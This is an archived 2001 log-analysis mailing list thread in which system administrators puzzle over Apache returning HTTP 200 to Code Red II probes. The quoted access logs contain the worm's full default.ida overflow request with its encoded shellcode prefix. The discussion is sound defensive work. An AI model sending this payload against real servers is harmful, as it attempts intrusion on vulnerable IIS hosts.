Re: [logs] 200 return code on Code Red II against Apache?

From: JW (jwat_private)
Date: Wed Sep 12 2001 - 15:28:21 PDT

  • Next message: Papo Napolitano: "Re: [logs] 200 return code on Code Red II against Apache?"

    What is the question: are you wondering why any UNIX box would actually have a default.ida? Well, there are a number of packages that implement Windows functions for UNIX, for example, Sun Microsystems now own Chili!Soft ASP, which is M$ ASP for UNIX. I belive the are similar packages for things besides ASP too.
    
    Is it possible that the servers in question have something like that installed? Apache FrontPage extensions maybe?
    
    Also, I recall some people discussing writing a dummy script that actually did something useful, like email the administrator of the client's netblock, or something, reporting the hit.
    
    At 03:57 PM 9/12/2001 -0500, you wrote:
    >Yes, I have four of them (very odd...)
    >
    >root@www:/var/log/apache# grep "default.ida" usb-access.log  | grep
    >"HTTP/1.0\" 200"
    >192.192.135.153 - - [05/Aug/2001:22:13:19 -0500] "GET
    >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    >HTTP/1.0" 200 -
    >211.41.178.2 - - [20/Aug/2001:05:06:41 -0500] "GET
    >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    >HTTP/1.0" 200 -
    >200.48.188.155 - - [22/Aug/2001:16:36:36 -0500] "GET
    >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    >HTTP/1.0" 200 -
    >195.117.169.40 - - [04/Sep/2001:03:51:49 -0500] "GET
    >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    >HTTP/1.0" 200 -
    >root@www:/var/log/apache#
    >
    >
    >Sweth Chandramouli wrote:
    >> 
    >>         This probably isn't appropriate for this list, or at
    >> least is more appropriate for other lists, but I'm tired (and about to
    >> go to sleep now that I've finally confirmed that none of my friends have
    >> been blown up or crushed by falling buildings) and figured the folks here
    >> might be likely to have seen this if anyone has.  So, has anyone seen an
    >> Apache server return a 200 rather than 404 (according to Apache's logs)
    >> in response to an attempted Code Red II exploit?  I've seen a single
    >> occurance of it to date, on a Solaris machine that quite regularly gets
    >> such attempts; all of the log entries for those other attempts (both
    >> before and since) had the proper 404 response code, but this particular
    >> one doesn't:
    >> 
    >> ct740592-a.westprt1.ky.home.com - - [11/Sep/2001:12:21:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 200 - "-" "-"
    >> 
    >>         .  I've only tracked down one other example of this
    >> mentioned on the web, at
    >> <http://www.geocrawler.com/lists/3/Debian-Linux/199/25/6335051/>; Ian,
    >> who reported that incident, never figured out what caused it, either.
    >> 
    >>         Could anyone who has seen this (or has a good idea of what
    >> it is) email me off-list?
    >> 
    >>         Thanks,
    >> 
    >>         Sweth.
    >> 
    >> --
    >> Sweth Chandramouli ; <svcat_private>
    >> President, Idiopathic Systems Consulting
    >> 
    >>   ------------------------------------------------------------------------
    >>    Part 1.2Type: application/pgp-signature
    >
    >-- 
    >djenkinsat_private                           Universal Savings Bank.
    >Security Administrator, Unix Administrator, Alpha Geek
    >
    >The three most dangerous things are a programmer with a soldering
    >iron, a manager who codes, and a user who gets ideas.
    >
    >---------------------------------------------------------------------
    >To unsubscribe, e-mail: loganalysis-unsubscribeat_private
    >For additional commands, e-mail: loganalysis-helpat_private
    
    ----------------------------------------------------
    Jonathan Wilson
    System Administrator
    
    Cedar Creek Software     http://www.cedarcreeksoftware.com
    Central Texas IT     http://www.centraltexasit.com
    
    
    ---------------------------------------------------------------------
    To unsubscribe, e-mail: loganalysis-unsubscribeat_private
    For additional commands, e-mail: loganalysis-helpat_private
    



    This archive was generated by hypermail 2b30 : Wed Sep 12 2001 - 15:34:30 PDT